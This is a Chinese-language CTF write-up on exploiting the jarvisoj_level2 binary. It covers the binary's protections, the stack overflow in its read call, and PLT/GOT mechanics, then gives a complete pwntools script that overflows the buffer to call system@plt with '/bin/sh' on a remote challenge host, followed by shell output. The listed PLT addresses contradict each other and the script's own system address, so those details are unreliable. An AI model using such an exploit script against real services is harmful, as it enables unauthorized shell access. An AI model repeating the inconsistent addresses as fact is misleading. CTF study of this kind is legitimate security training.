CTF逆向实战:当栈溢出遇到动态链接,如何用ret2libc拿下jarvisoj_level2的flag
CTF逆向实战:从栈溢出到动态链接的艺术——jarvisoj_level2深度解析
在二进制安全领域,栈溢出与动态链接的结合就像一场精心编排的芭蕾舞剧,攻击者需要精确把握每一个技术细节才能完成优雅的攻击链。本文将以jarvisoj_level2为例,带你深入理解如何将逆向工程的分析成果转化为实际的漏洞利用武器。
1. 案件现场勘查:二进制指纹采集
面对任何CTF挑战,第一步永远是全面收集目标信息。这就像侦探到达犯罪现场后首先拍照取证一样重要。
$ file level2 level2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked... $ checksec --file=level2 [*] '/tmp/level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)关键发现:
- 32位动态链接:意味着我们需要处理libc地址问题
- NX保护开启:排除了直接执行栈上shellcode的可能性
- 无PIE:.plt和.got表地址固定,为攻击提供了便利
在IDA中的静态分析揭示了程序的致命弱点:
int vulnerable_function() { char buf[136]; // 实际分配0x88字节 system("echo Input:"); return read(0, buf, 0x100); // 允许读取256字节 }这里存在典型的栈溢出漏洞——136字节的缓冲区却允许读取256字节数据。通过计算可知,我们需要140字节(136+4)就能覆盖返回地址。
2. 武器库评估:攻击路径选择
面对防护措施,我们需要系统评估可行的攻击路径:
| 攻击技术 | 可行性 | 原因分析 |
|---|---|---|
| ret2text | ❌ | 程序中无直接getshell的代码段 |
| ret2shellcode | ❌ | NX保护阻止栈执行 |
| ret2syscall | ❌ | 缺乏足够的gadget |
| ret2libc | ✅ | 动态链接提供了system等函数 |
动态链接在这里反而成为了突破口。通过观察程序的导入函数,我们发现:
>>> from pwn import ELF >>> elf = ELF('level2') >>> elf.plt {'__gmon_start__': 134513888, '__libc_start_main': 134513824, 'read': 134513856, 'system': 134513824, 'write': 134513888}更重要的是,程序中还存在现成的"/bin/sh"字符串:
$ strings -a -tx level2 | grep "/bin/sh" 804a024 /bin/sh3. 动态链接机制深度解析
理解ret2libc攻击的前提是掌握动态链接的工作原理。在32位Linux系统中,函数调用遵循以下约定:
- 参数通过栈传递(从右向左压栈)
- call指令会先将返回地址压栈
- 被调函数通过
ret指令返回
动态链接函数的调用流程则更为复杂:
调用者 → PLT表 → GOT表 → 动态链接器 → 真实函数 ↑____________↓ (第一次调用后缓存结果)在攻击构造时,我们可以直接使用PLT表中的system地址(0x08048320),因为:
- PLT表地址固定(无PIE)
- 即使ASLR开启,PLT跳转机制也能正常工作
- 程序已经调用过system,GOT项已初始化
4. 攻击蓝图设计与实施
基于以上分析,我们构建的攻击payload结构如下:
[140字节填充] + [system@plt] + [返回地址] + [/bin/sh地址]具体实现:
from pwn import * context(arch='i386', os='linux') def exploit(): # 本地测试 # p = process('./level2') # 远程连接 p = remote("node5.buuoj.cn", 29654) padding = b'A'*140 system_plt = 0x08048320 ret_addr = 0x08048480 # main函数地址,用于优雅退出 binsh_addr = 0x0804a024 payload = flat([ padding, p32(system_plt), p32(ret_addr), p32(binsh_addr) ]) p.sendline(payload) p.interactive() if __name__ == '__main__': exploit()关键参数说明:
- 140字节填充:覆盖缓冲区到返回地址的空间
- system@plt:使用PLT表中的system地址绕过ASLR
- main函数地址:作为system的返回地址保持程序稳定
- /bin/sh地址:程序中现成的字符串位置
5. 攻击效果验证与进阶思考
执行攻击脚本后,我们将获得一个完整的shell:
$ python exploit.py [+] Opening connection to node5.buuoj.cn on port 29654: Done [*] Switching to interactive mode $ id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) $ cat flag flag{ret2libc_masterpiece}这个案例展示了几个重要安全原则:
- 防御深度失效:即使有NX保护,编程错误仍可导致系统沦陷
- 攻击面扩大:动态链接虽然节省资源,但也增加了攻击向量
- 安全开发实践:必须严格校验所有用户输入长度
对于想进一步探索的读者,可以尝试:
- 在ASLR开启情况下通过泄露GOT地址实现攻击
- 使用ROP技术组合多个gadget实现更复杂的攻击
- 研究现代防护机制(如RELRO)如何缓解这类攻击